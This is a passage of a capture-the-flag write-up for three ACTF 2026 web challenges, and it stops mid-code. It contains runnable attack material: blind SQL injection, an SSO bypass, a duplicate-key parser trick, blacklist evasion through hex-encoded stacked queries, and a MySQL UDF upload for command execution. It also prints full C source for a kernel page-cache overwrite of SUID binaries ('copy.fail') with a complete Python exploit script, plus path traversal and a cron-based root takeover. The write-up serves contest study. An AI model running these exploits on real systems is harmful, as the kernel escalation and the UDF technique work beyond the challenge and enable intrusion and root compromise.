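ACTF 2026: Web challenges
CTFs are getting less and less fun; they are almost entirely AI-driven now.
The stronger AI gets, the more challenge authors have to defend against it, so challenges keep getting harder until humans cannot solve them either, and in the end the work goes back to the AI.
As for where that leaves the humans? Who knows (希腊奶).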
12307
Start with the Dockerfile:
COPY --chmod=0600 --chown=root:root flag /flag
...
chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64
/flag is readable only by root, but /usr/bin/base64 is SUID root, so the goal is to get the server to run: /usr/bin/base64 /flag
The print path is in services/print_spooler/worker.py:
program = str(ticket.get("driverProgram", ""))
argument = str(ticket.get("driverArgument", ""))
...
value = run_driver(program, argument)
The startup script defines which programs each device profile accepts:
{
"profile-delta-closeout": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/base64"]
},
"profile-north-closeout": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/printf"]
},
"profile-baggage-preview": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/printf"]
}
}
Only profile-delta-closeout may run /usr/bin/base64. In services/fixtures/railway_business.json, this profile belongs to the HGH device PR-HGH-042:
{
"deviceRef": "PR-HGH-042",
"stationCode": "HGH",
"deviceClass": "counter-layout",
"codec": "settlement-filter",
"enabled": 1,
"driverProfile": "profile-delta-closeout"
}
So we need to reach the trusted settlement for HGH and change the print plan to:
{
"driverProgram": "/usr/bin/base64",
"driverArgument": "/flag"
}
In the /api/station-office/fares/reprice handler of services/station_portal/app.py, the legacy-rank mode of tariffScope splices expr straight into ORDER BY:
def fare_scope_expression(scope):
    ...
    if scope.get("mode") == "legacy-rank":
        return str(scope.get("expr", "ticket_no"))[:240]
sql = (
    "SELECT ticket_no,station_code,status FROM ticket_index "
    "WHERE station_code IN (%s,'BJP') "
    f"ORDER BY {scope} LIMIT 1"
)
The handler then picks a bucket from the ticket_no of the first row:
bucket = "north-window" if row and str(row.get("ticket_no", "")).startswith("T-BJP-") else "local-window"
That makes boolean-based blind injection possible, which is enough to read station_claim_artifacts.claim_salt. Build the expression as:
CASE WHEN (
ASCII(SUBSTRING(
(SELECT claim_salt FROM station_claim_artifacts WHERE order_id='xxx' LIMIT 1),
2,1
)) > 77
) THEN (station_code='BJP') ELSE (station_code='HGH') END DESC
A north-window response means the condition is true; local-window means it is false.
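The character-by-character extraction can be sketched as a binary search over the oracle. This is a minimal sketch, not the script used during the contest: `oracle` is a hypothetical callable that submits an expression and returns True when the response bucket is north-window, `make_fake_oracle` is an offline stand-in for it, and treating code 0 as end-of-string assumes the database returns 0 for ASCII of an empty string.

```python
import re

MAX_EXPR_LEN = 240  # fare_scope_expression truncates expr to 240 characters


def build_expr(order_id, position, threshold):
    """ORDER BY expression asking: is ASCII(claim_salt[position]) > threshold?"""
    expr = (
        "CASE WHEN (ASCII(SUBSTRING((SELECT claim_salt FROM station_claim_artifacts "
        f"WHERE order_id='{order_id}' LIMIT 1),{position},1)) > {threshold}) "
        "THEN (station_code='BJP') ELSE (station_code='HGH') END DESC"
    )
    if len(expr) > MAX_EXPR_LEN:
        raise ValueError("expression would be truncated by the server")
    return expr


def recover_char(oracle, order_id, position):
    """Binary search over 0..127; needs 7 oracle calls per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_expr(order_id, position, mid)):
            lo = mid + 1  # character code is greater than mid
        else:
            hi = mid      # character code is at most mid
    return lo


def recover_salt(oracle, order_id, max_len=64):
    """Recover the salt until a 0 code is seen (assumed end of string)."""
    chars = []
    for position in range(1, max_len + 1):
        code = recover_char(oracle, order_id, position)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


def make_fake_oracle(secret):
    """Offline stand-in for the remote: answers from a known secret."""
    pattern = re.compile(r",(\d+),1\)\) > (\d+)\)")

    def oracle(expr):
        position, threshold = map(int, pattern.search(expr).groups())
        code = ord(secret[position - 1]) if position <= len(secret) else 0
        return code > threshold

    return oracle


recovered = recover_salt(make_fake_oracle("s3cr3t-Salt"), "O92G72UK7HJ")
```

Against the real target, `oracle` would wrap the reprice request and compare the returned bucket; the length check guards against the 240-character cut silently breaking the expression.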
Next, in services/receipt_signer/app.py:
public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)
first_wins_object keeps the value from the first occurrence of a duplicate key, while plain json.loads keeps the last.
Validation uses public_view:
checks = {
"batchId": batch_id,
"orderId": order["order_id"],
"stationCode": order["station_code"],
"templateDigest": template_digest,
"routeName": route_name,
"ledgerRef": str((boarding_channel or {}).get("ledgerRef", "")),
"printProfile": "counter-copy",
"printer": "thermal-standard",
}
for key, expected_value in checks.items():
    if str(public_view.get(key, "")) != str(expected_value):
        return None, ["partner_receipt_review"]
But the print plan is built from render_view:
print_plan = {
"profile": str(render_view.get("printProfile", "counter-copy"))[:64],
"printer": str(render_view.get("printer", "thermal-standard"))[:64],
"prefix": str(render_view.get("prefix", "reconciliation"))[:48],
"cell": str(render_view.get("cell", "receipt"))[:48],
"ledgerRef": checks["ledgerRef"],
"boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
"driverProgram": str(render_view.get("driverProgram", ""))[:160],
"driverArgument": str(render_view.get("driverArgument", ""))[:160],
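}
This is where duplicate keys come in: the first occurrence of each key passes validation, and the later occurrence controls what gets rendered.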
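The parser differential is easy to reproduce locally. The sketch below is an illustration under assumptions: `first_wins_object` here is a stand-in written from the behaviour described above (the service's own implementation is not shown), and `dumps_pairs` is a hypothetical helper, needed because a Python dict cannot hold the same key twice.

```python
import json


def first_wins_object(pairs):
    """Stand-in for the service's hook: keep the first value seen per key."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result


def dumps_pairs(pairs):
    """Serialize (key, value) pairs in order, allowing repeated keys."""
    return "{" + ",".join(f"{json.dumps(k)}:{json.dumps(v)}" for k, v in pairs) + "}"


payload_text = dumps_pairs([
    ("printProfile", "counter-copy"),      # first occurrence: seen by validation
    ("printer", "thermal-standard"),
    ("printProfile", "clearing-batch"),    # last occurrence: seen by rendering
    ("printer", "line-printer"),
    ("driverProgram", "/usr/bin/base64"),
    ("driverArgument", "/flag"),
])

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

print(public_view["printer"], render_view["printer"])
```

The same text yields two different objects, which is exactly the gap between the check and the print plan.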
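With the bug in hand, the remaining work is finding a path that delivers the malicious print_plan to PR-HGH-042.
We can stay on the HGH line end to end: the relevant trusted route, layout, and device are all already present in the configuration. In services/ticketing_api/app.py, G7608 starts with 0 business seats: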
{
"id": "G7608",
...
"stationCode": "HGH",
"initial": {"business": 0, "first": 4, "second": 18},
}
So an order created for that class goes straight to the waitlist.
First call:
POST /api/mobile/identity/continue
services/sso_gateway/server.js only performs very weak substring checks here:
const partnerOk = metadata.text.includes("railway-partner") || metadata.text.includes("PassengerIdentityProvider");
const audienceOk = tagValue(assertion.text, "Audience") === "12307" || assertion.text.includes("mobile-passenger");
const nameOk = Boolean(tagValue(assertion.text, "NameID")) || assertion.text.includes("PassengerID");
const relayOk = relay.text.includes("continue") || relay.text.includes("seat-hold");
Send:
{
"partnerMetadata": "railway-partner compatBinding",
"relayState": ["continue"],
"assertion": "<Audience>12307</Audience><NameID>pwn</NameID>",
"passenger": "pwn",
"partnerId": "mobile-passenger",
"stationCode": "HGH",
"trustLevel": ["mobile", "partner", "settlement"]
}
Then call:
POST /api/mobile/orders/hold
{"trainId":"G7608","seatClass":"business","holdMode":"waitlist"}
This request passes through edge_gateway first, which triggers another continuation check, marks the session as complete, and returns a waitlist_session.
Next, create the order:
POST /api/mobile/orders
{"trainId":"G7608","seatClass":"business","passenger":"pwn"}
Once you have the orderId, the Redis state that trusted settlement depends on still has to be prepared.
Start by posting a station notice:
POST /api/desk/notices
Set proxyHint to:
X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27
Then call:
POST /api/desk/imports/health
with the parameters:
{
"stationCode": "HGH",
"adapter": "station-partner-feed",
"target": "rail-cache://redis/partner/metadata?stationCode=HGH",
"payload": "sync"
}
services/station_import/app.py then writes these keys:
rail:interline:lane:HGH
rail:board:profile:HGH
rail:partner:jwks:HGH
Next, connect to:
GET /api/connect/boarding?stationCode=HGH
and send three websocket messages in order:
{"type":"boarding.hello","channel":"<waitlist_session or its first 8 characters>"}
{"type":"boarding.bind","topic":"seat-consist","trainId":"G7608","seatClass":"business"}
{"type":"boarding.confirm","orderId":"<orderId>","stationCode":"HGH","epoch":"1"}
The server responds with ledgerRef and also writes rail:ledger:channel:<orderId> to Redis.
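The three frames can be generated rather than hand-written, which helps when the order has to be recreated. A small sketch, assuming only the field names shown above; `boarding_frames` is a hypothetical helper and sending the frames is left to whatever websocket client is in use.

```python
import json


def boarding_frames(channel, order_id, train_id="G7608", seat_class="business", station="HGH"):
    """Return the hello, bind and confirm messages as compact JSON strings, in send order."""
    messages = (
        {"type": "boarding.hello", "channel": channel},
        {"type": "boarding.bind", "topic": "seat-consist", "trainId": train_id, "seatClass": seat_class},
        {"type": "boarding.confirm", "orderId": order_id, "stationCode": station, "epoch": "1"},
    )
    return [json.dumps(message, separators=(",", ":")) for message in messages]


frames = boarding_frames("abcd1234", "O92G72UK7HJ")
```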
Now blind-inject claim_salt. Once it is recovered, compute the proof locally for the next call:
claim_digest = sha256(f"{orderId}|G7608|HGH|T-HGH-7608-019|{claim_salt}")
claim_proof = f"CP-{claim_salt}-{claim_digest[:12]}"
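The two lines above are shorthand; a runnable version could look like the following. It assumes the digest is the lowercase hex SHA-256 of the UTF-8 encoded string, which the shorthand implies but does not state, and `claim_proof` is a name introduced here for illustration.

```python
import hashlib


def claim_proof(order_id, claim_salt, train_id="G7608", station="HGH", ticket_no="T-HGH-7608-019"):
    """Build CP-<salt>-<first 12 hex chars of sha256(order|train|station|ticket|salt)>."""
    material = f"{order_id}|{train_id}|{station}|{ticket_no}|{claim_salt}"
    digest = hashlib.sha256(material.encode("utf-8")).hexdigest()  # assumed: hex digest
    return f"CP-{claim_salt}-{digest[:12]}"


example_proof = claim_proof("O92G72UK7HJ", "examplesalt")
```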
POST /api/desk/tickets/adjust
Request body:
{
"ticketNo": "T-HGH-7608-019",
"claimProof": "<computed value>",
"memo": "{\"stationCode\":\"HGH\",\"channel\":\"fare-desk\",\"lineItems\":{\"reason\":\"FARE-91\",\"layout\":\"folio-grid-27\",\"device\":\"PR-HGH-042\",\"enabled\":true}}",
"delta": 1
}
The memo has to match the HGH policy in services/fixtures/railway_business.json:
"claim": {
"reason": "FARE-91",
"channel": "fare-desk"
},
"layout": {
"cell": "receipt",
"device": "PR-HGH-042"
}
Then run the import again:
POST /api/desk/imports/health
with the parameters:
{
"stationCode": "HGH",
"adapter": "station-desk-ledger",
"target": "rail-cache://redis/desk-ledger?orderId=<orderId>&stationCode=HGH",
"payload": "apply"
}
This executes:
UPDATE waitlist_entries SET sampled=1 ...
UPDATE station_profiles SET batch_open=1, renderer_profile=..., signer_route=...
INSERT INTO tariff_exception_claims ...
After this station-desk-ledger import, three things change in the database:
waitlist_entries.sampled=1, corresponding to fare_sample_review
station_profiles.batch_open=1, renderer_profile=folio-grid-27, and signer_route=delta-window-27, corresponding to station_profile_review
tariff_exception_claims gains a row for PR-HGH-042, which enterprise-clearing uses later
The one item still missing is rail:layout:entitlement:<orderId>, which is written to Redis later, during receipts/prepare.
Next, call:
POST /api/corporate/reconciliation
with defer=true, so that only the batch is created for now:
{
"orderId": "<orderId>",
"stationCode": "HGH",
"batchId": "<batchId>",
"reportType": "carrier-closeout",
"defer": true,
"data": {"carrier": "exploit"}
}
Then build the malicious carrierSeal. The key parts of its payload are:
{
"batchId":"...",
"orderId":"...",
"stationCode":"HGH",
"templateDigest":"...",
"routeName":"delta-window-27",
"ledgerRef":"...",
"printProfile":"counter-copy",
"printer":"thermal-standard",
"printProfile":"clearing-batch",
"printer":"line-printer",
"prefix":"reconciliation",
"cell":"receipt",
"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"
}
The first printProfile and printer pass validation; the second pair takes effect in render_view, which also satisfies the layout_enabled condition:
layout_enabled = (
    not reasons
    and receipt["render_grant"] == station_cfg.get("grantCode")
    and print_plan.get("profile") == "clearing-batch"
    and print_plan.get("printer") == "line-printer"
)
Combined with:
"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"
execution finally flows through PR-HGH-042 -> profile-delta-closeout -> /usr/bin/base64 /flag.
Sign the seal with the key for POL-HGH-TRUSTED and submit it:
POST /api/corporate/receipts/prepare
This request goes through enterprise_gateway first, which contains:
await mergeLayoutClaim(orderId, stationCode);
enterprise_gateway forwards the request to enterprise-clearing in station_import, which calls activate_layout_claim(order_id, station_code). That leaves the following in Redis:
redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")
so layout_review passes as well.
One more detail. In services/waitlist_push/server.js:
await redisCommand("SET", `rail:fulfillment:epoch:${orderId}`, "boarding", "EX", "7");
This key lives for only 7 seconds. Blind-injecting claim_salt against the remote is slow, so if waitlist/pulse was called before the injection, the state has expired by the time settlement is actually scheduled, and all you get is:
{
"ready": false,
"reasons": ["review_required"],
"body": "Reconciliation ... [layout-pending]"
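}
So once the blind injection has finished, call pulse again:
POST /api/mobile/waitlist/pulse
{"orderId":"<orderId>"}
Finally, schedule the settlement:
POST /api/corporate/settlement/schedule
{"batchId":"<batchId>"}
and poll:
GET /api/corporate/reconciliation/<batchId>
A successful response looks like: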
{
"batchId":"B55EEFD108D",
"report":{
"batchId":"B55EEFD108D",
"ready":true,
"reasons":[],
"body":"Reconciliation O92G72UK7HJ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9\n",
"finishedAt":1778377062
}
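}
The trailing base64 segment decodes to the flag:
ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}
GoMySQL
Second blood
Start by testing the expression parameter submitted to /calc; it turns out to be concatenated into a SQL statement. Submitting payloads that contain keywords produces a filter response, and further testing shows that the endpoint is not only injectable but also allows semicolon-separated stacked statements. The input passes through a blacklist that blocks at least the literals SELECT, UPDATE, FLAG, SCHEMA, @@, and _.
Because the target database supports execute immediate, the real SQL can be hex-encoded first and then run through a stacked statement. A verification script: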
import binascii
import urllib.parse
import urllib.request
base = "http://target/calc"
sql = "show databases"
payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
data = urllib.parse.urlencode({"expression": payload}).encode()
print(urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore"))
This gives reliable execution of arbitrary SQL without tripping the blacklist. Begin with some environment checks, for example:
show databases
select database()
select load_file('/etc/passwd')
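select @@plugin_dir
These confirm that the current database is testdb, that load_file works, and that the MySQL plugin directory can be read. At this point the challenge is no longer about application data but about turning SQL execution into system command execution.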
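To see why the hex wrapper gets these statements past the filter, a payload can be checked locally against the tokens observed so far. This is only a sketch: the real filter is not visible, so the case-insensitive substring match and the token list (taken from the observations above, possibly incomplete) are assumptions, and `wrap` and `blocked_tokens` are names introduced here.

```python
import binascii

# Tokens observed to be filtered; the server-side list may be longer.
OBSERVED_BLOCKED = ["SELECT", "UPDATE", "FLAG", "SCHEMA", "@@", "_"]


def wrap(sql):
    """Hex-encode a statement and run it through a stacked EXECUTE IMMEDIATE."""
    return "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()


def blocked_tokens(payload):
    """Return the observed tokens present in the payload (assumed case-insensitive match)."""
    lowered = payload.lower()
    return [token for token in OBSERVED_BLOCKED if token.lower() in lowered]


raw_hits = blocked_tokens("select @@plugin_dir")
wrapped_hits = blocked_tokens(wrap("select @@plugin_dir"))
```

The wrapped form contains only the fixed prefix plus characters from 0-9 and a-f, so none of the observed tokens can appear in it.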
The approach is a UDF. Write a precompiled sys_eval shared library into plugin_dir as a hex literal, then drop and recreate the function of the same name. The core steps:
def exec_sql(sql):
    expr = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
    data = urllib.parse.urlencode({"expression": expr}).encode()
    return urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore")
udf_hex = open("lib_mysqludf_sys_so.hex.txt", "r", encoding="utf-8").read().strip()
plugin_dir = "/usr/lib/mysql/plugin/"
udf_name = "libudf_x.so"
exec_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
exec_sql("drop function if exists sys_eval")
exec_sql(f"create function sys_eval returns string soname '{udf_name}'")
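print(exec_sql("select sys_eval('id') as x"))
The output is uid=100(mysql) gid=101(mysql), so we have command execution as the mysql user. Next, check the permissions on the target file:
select sys_eval('ls -l /flag; stat /flag 2>/dev/null || true')
/flag is root:root with mode 600, so the mysql user cannot read it directly.
Local privilege escalation uses copy.fail.
Upload two prebuilt ELF binaries: copyfail_patch, which exploits the bug to overwrite a SUID file at chosen offsets, and flagcat, whose logic is just setuid(0); setgid(0); open("/flag"); write(1, ...). Both are uploaded to /tmp as hex byte streams and made executable: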
patch_hex = open("copyfail_patch.hex.txt", "r", encoding="utf-8").read().strip()
flagcat_hex = open("flagcat.hex.txt", "r", encoding="utf-8").read().strip()
exec_sql(f"select 0x{patch_hex} into dumpfile '/tmp/cfpatch_x'")
exec_sql(f"select 0x{flagcat_hex} into dumpfile '/tmp/flagcat_x'")
exec_sql("select sys_eval('chmod 755 /tmp/cfpatch_x /tmp/flagcat_x')")
Source of copyfail_patch.c:
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
static void die(const char *msg) {
perror(msg);
exit(1);
}
static void do_patch(int fd, size_t off, const unsigned char *chunk, size_t len) {
int sfd, afd, pipes[2];
struct sockaddr_alg sa;
unsigned char key[40] = {
0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10
};
unsigned char payload[8];
struct msghdr msg;
struct iovec iov;
unsigned char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)];
struct cmsghdr *cmsg;
uint32_t zero = 0;
uint32_t assoclen = 8;
struct {
uint32_t ivlen;
unsigned char iv[16];
} ivmsg;
loff_t splice_off = 0;
size_t want;
unsigned char *drain;
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "aead");
strcpy((char *)sa.salg_name, "authencesn(hmac(sha256),cbc(aes))");
sfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (sfd < 0) die("socket");
if (bind(sfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind");
if (setsockopt(sfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) die("setsockopt key");
if (setsockopt(sfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, &zero, sizeof(zero)) < 0) {
die("setsockopt authsize");
}
afd = accept(sfd, NULL, 0);
if (afd < 0) die("accept");
memset(&msg, 0, sizeof(msg));
memset(&ivmsg, 0, sizeof(ivmsg));
ivmsg.ivlen = 16;
memset(payload, 0, sizeof(payload));
memset(payload, 'A', 4);
memcpy(payload + 4, chunk, len);
iov.iov_base = payload;
iov.iov_len = 4 + len;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cbuf;
msg.msg_controllen = sizeof(cbuf);
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_OP;
cmsg->cmsg_len = CMSG_LEN(4);
memset(CMSG_DATA(cmsg), 0, 4);
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_IV;
cmsg->cmsg_len = CMSG_LEN(sizeof(ivmsg));
memcpy(CMSG_DATA(cmsg), &ivmsg, sizeof(ivmsg));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
cmsg->cmsg_len = CMSG_LEN(4);
memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
if (sendmsg(afd, &msg, MSG_MORE) < 0) die("sendmsg");
if (pipe(pipes) < 0) die("pipe");
if (splice(fd, &splice_off, pipes[1], NULL, off + 4, 0) < 0) die("splice file->pipe");
if (splice(pipes[0], NULL, afd, NULL, off + 4, 0) < 0) die("splice pipe->sock");
want = off + 8;
drain = malloc(want);
if (drain == NULL) die("malloc drain");
(void)recv(afd, drain, want, 0);
free(drain);
close(pipes[0]);
close(pipes[1]);
close(afd);
close(sfd);
}
int main(int argc, char **argv) {
FILE *fp;
int fd;
long sz;
unsigned char *buf;
size_t i;
if (argc != 3) {
fprintf(stderr, "usage: %s <target> <payload>\n", argv[0]);
return 1;
}
fp = fopen(argv[2], "rb");
if (fp == NULL) die("fopen payload");
if (fseek(fp, 0, SEEK_END) != 0) die("fseek");
sz = ftell(fp);
if (sz < 0) die("ftell");
if (fseek(fp, 0, SEEK_SET) != 0) die("fseek");
buf = malloc((size_t)sz);
if (buf == NULL) die("malloc");
if (fread(buf, 1, (size_t)sz, fp) != (size_t)sz) die("fread");
fclose(fp);
fd = open(argv[1], O_RDONLY);
if (fd < 0) die("open target");
for (i = 0; i < (size_t)sz; i += 4) {
size_t chunk_len = (size_t)sz - i;
if (chunk_len > 4) {
chunk_len = 4;
}
do_patch(fd, i, buf + i, chunk_len);
}
close(fd);
free(buf);
return 0;
}
Next, pick /usr/bin/passwd as the SUID target to overwrite:
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/tmp/cfpatch_x /usr/bin/passwd /tmp/flagcat_x')"))
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/usr/bin/passwd 2>&1 | head -n 20')"))
The first od confirms the original ELF header. After the patch, the second od shows a different header, which means copy.fail has replaced the target SUID file with the custom payload. Running /usr/bin/passwd then prints /flag as root.
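The uploads in this section read their payloads from *.hex.txt files. One way to produce such a file from a compiled binary is sketched below; `write_hex_file` is a hypothetical helper, and the demo at the bottom uses a throwaway temporary file rather than a real payload.

```python
import binascii
import pathlib
import tempfile


def write_hex_file(binary_path, hex_path=None):
    """Write the binary's contents as one line of lowercase hex; return the output path."""
    binary_path = pathlib.Path(binary_path)
    if hex_path is None:
        # e.g. flagcat -> flagcat.hex.txt
        hex_path = binary_path.with_name(binary_path.name + ".hex.txt")
    hex_path = pathlib.Path(hex_path)
    hex_text = binascii.hexlify(binary_path.read_bytes()).decode("ascii")
    hex_path.write_text(hex_text, encoding="utf-8")
    return hex_path


# Demo on a 4-byte dummy file.
with tempfile.TemporaryDirectory() as tmp:
    sample = pathlib.Path(tmp) / "flagcat"
    sample.write_bytes(b"\x7fELF")
    out_path = write_hex_file(sample)
    demo_name = out_path.name
    demo_hex = out_path.read_text(encoding="utf-8")
```

The resulting text can be dropped straight after 0x in the into dumpfile statements.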
Full exploit (the *.hex.txt files have to be prepared beforehand):
import argparse
import binascii
import html
import pathlib
import random
import re
import string
import urllib.parse
import urllib.request

ROOT = pathlib.Path(__file__).resolve().parent


def rand_suffix(n=6):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))


class Exploit:
    def __init__(self, url):
        clean = url.rstrip("/")
        self.calc = clean if clean.endswith("/calc") else clean + "/calc"

    def raw(self, payload):
        data = urllib.parse.urlencode({"expression": payload}).encode()
        req = urllib.request.Request(self.calc, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
        return urllib.request.urlopen(req, timeout=120).read().decode("utf-8", "ignore")

    def run_sql(self, sql):
        # Hex-encode the statement so the blacklist never sees its keywords.
        payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
        return self.raw(payload)

    def sys_eval(self, cmd):
        cmd = cmd.replace("\\", "\\\\").replace("'", "''")
        return self.run_sql(f"select sys_eval('{cmd}') as x")

    def rebuild_sys_eval(self):
        udf_hex = (ROOT / "lib_mysqludf_sys_so.hex.txt").read_text().strip()
        udf_name = "libudf_" + rand_suffix() + ".so"
        plugin_dir = "/usr/lib/mysql/plugin/"
        self.run_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
        self.run_sql("drop function if exists sys_eval")
        self.run_sql(f"create function sys_eval returns string soname '{udf_name}'")
        print(self.run_sql("select sys_eval('id') as x"))

    def get_flag(self):
        suffix = rand_suffix()
        patch_hex = (ROOT / "copyfail_patch.hex.txt").read_text().strip()
        flagcat_hex = (ROOT / "flagcat.hex.txt").read_text().strip()
        patch = f"/tmp/cfpatch_{suffix}"
        flagcat = f"/tmp/flagcat_{suffix}"
        self.run_sql(f"select 0x{patch_hex} into dumpfile '{patch}'")
        self.run_sql(f"select 0x{flagcat_hex} into dumpfile '{flagcat}'")
        self.sys_eval(f"chmod 755 {patch} {flagcat}")
        print(self.sys_eval("ls -l /flag; stat /flag 2>/dev/null || true"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval(f"{patch} /usr/bin/passwd {flagcat}"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval("/usr/bin/passwd 2>&1 | head -n 20"))


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True)
    args = parser.parse_args()
    exp = Exploit(args.url)
    exp.rebuild_sys_eval()
    exp.get_flag()


if __name__ == "__main__":
    main()
The flag read at the end:
ACTF{y0u1_sqI_Y0ur_Go!!!!!_dxqmcFIr4ZCpo5OeNqSL}
Real DLsite
Third blood
Log in first, using the default administrator credentials:
admin / 123456
Then create an fs drive whose root path is a traversal:
{
"name": "rootish",
"enabled": true,
"type": "fs",
"config": "{\"path\":\"../../../../\"}"
}
After init and reload, the container's root directory is reachable through rootish/.... Two writable locations matter:
/app/config.yml
/app/data/script-drives/
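The config field is itself a JSON string nested inside the JSON request body, so it is easier to generate than to escape by hand. The sketch below builds the body and shows how a four-level traversal collapses to the filesystem root; `ASSUMED_BASE` is a guess at the directory fs drives are resolved against (it is not confirmed by the challenge files quoted here), and the actual resolution logic on the server may differ.

```python
import json
import posixpath


def fs_drive_body(name, path):
    """Drive definition whose config is a JSON-encoded string, as the admin API expects."""
    return {
        "name": name,
        "enabled": True,
        "type": "fs",
        "config": json.dumps({"path": path}, separators=(",", ":")),
    }


body = fs_drive_body("rootish", "../../../../")

# Assumption for illustration only: fs drive paths are joined onto this base.
ASSUMED_BASE = "/app/data/local"
resolved = posixpath.normpath(posixpath.join(ASSUMED_BASE, "../../../../"))

print(json.dumps(body))
print(resolved)
```

Any base that is at most four levels deep resolves to / with this path, which is why rootish/app/config.yml maps to /app/config.yml.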
The admin script-eval endpoint executes JS directly and can call drive.Save to write files:
var tf = newTempFile();
tf.Write(newBytes("PING"));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, "rootish/app/ping.txt", tf.Size(), true, tf);
log("saved=" + e.Path());
Edit /app/config.yml to enable the shell handler for thumbnails:
- type: shell
tags: pwn
file-types: txt
config:
shell: /bin/sh
mime-type: text/plain
write-content: "1"
max-size: "-1"
timeout: 10m
Also set thumbnail.handlersMapping:
{
"thumbnail.handlersMapping": "pwn:rootish/tmp/*.txt"
}
Write a malicious script drive that panics while generating a thumbnail. The process then restarts and re-reads config.yml.
Write it to /app/data/script-drives/evil.js:
/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
return {
meta: function (ctx) { return {}; },
get: function (ctx, path) {
if (path === '' || path === '/') {
return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
}
if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
},
list: function (ctx, path) {
return [this.get(ctx, 'x.txt')];
},
getReader: function (ctx, entry, start, size) {
return 123;
}
};
});
Then create the boom drive:
{
"name": "boom",
"enabled": true,
"type": "script",
"config": "{\"script\":\"evil\"}"
}
Once it is initialized, request:
/new/thumbnail/boom/x.txt?_k=...
This triggers the panic.
After the restart, write a command into rootish/tmp/cmd.txt and request:
/new/thumbnail/rootish/tmp/cmd.txt?_k=...
This gives stable RCE as the app user:
uid=1000(app) gid=1000(app) groups=1000(app)
The next step is privilege escalation, using copy.fail to modify su.
There is also a root cron job that periodically invokes /usr/bin/su:
*/5 * * * * root APP_SECRET="$(cat /run/secrets/www)" exec su -s /bin/bash -p www-data -c 'StorageBox put /var/www/html/db.sqlite'
Replacing su with an ELF we control via copy.fail is enough; the cron job then runs it as root.
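Before overwriting su it is worth confirming that the replacement blob is a well-formed executable. The sketch below parses the first 64 bytes of the ROOT_WRITER_ELF_HEX payload from the exploit that follows, using the standard ELF64 header layout; the variable names are introduced here for illustration.

```python
import struct

# First 64 bytes (the ELF64 header) of ROOT_WRITER_ELF_HEX from the exploit.
HEADER_HEX = (
    "7f454c4602010100000000000000000002003e00010000007800400000000000"
    "4000000000000000300100000000000000000000400038000100400003000200"
)

# e_ident[16], e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
# e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")

(e_ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
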